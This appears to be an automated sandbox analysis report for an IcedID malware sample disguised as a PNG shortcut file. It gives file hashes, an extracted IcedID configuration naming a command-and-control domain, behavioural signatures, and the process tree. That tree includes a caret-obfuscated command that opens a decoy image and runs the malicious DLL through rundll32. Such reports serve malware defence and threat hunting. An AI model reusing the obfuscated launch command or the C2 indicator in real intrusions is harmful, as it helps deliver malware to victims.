Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
19/09/2022, 16:40
Static task
static1
Behavioral task
behavioral1
Sample
demoscan-130722.31825.png.lnk
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
demoscan-130722.31825.png.lnk
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
lxLoqZul.dll
Resource
win7-20220812-en
General
-
Target
demoscan-130722.31825.png.lnk
-
Size
1KB
-
MD5
94becc82bec4b426037f84299cf26513
-
SHA1
c10372b5620ca781e45223beb28523a6ab393d3a
-
SHA256
8f3a28d2fb7c2ec67f083194a9c44edef94c20c1d5b10e2d0e45385c5f7b542f
-
SHA512
f7e86bb9ccfdf0651ba13738226ba222a74acec35a578aa7a297a54ab23aaccc3d241259fb495c3aca50b076fb12c017e314761b220f0ce4e0dd466fe72472d8
Malware Config
Extracted
icedid
775636601
aviadronazhed.com
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 2 1156 rundll32.exe 4 1156 rundll32.exe 5 1156 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1156 rundll32.exe 1156 rundll32.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1288 wrote to memory of 1472 1288 cmd.exe 28 PID 1288 wrote to memory of 1472 1288 cmd.exe 28 PID 1288 wrote to memory of 1472 1288 cmd.exe 28 PID 1472 wrote to memory of 1156 1472 cmd.exe 30 PID 1472 wrote to memory of 1156 1472 cmd.exe 30 PID 1472 wrote to memory of 1156 1472 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\demoscan-130722.31825.png.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "start Eh7rlR3b.png && start r^un^dl^l3^2 lxLoqZul.d^l^l, #1"2⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\system32\rundll32.exerundll32 lxLoqZul.dll, #13⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1156
-
-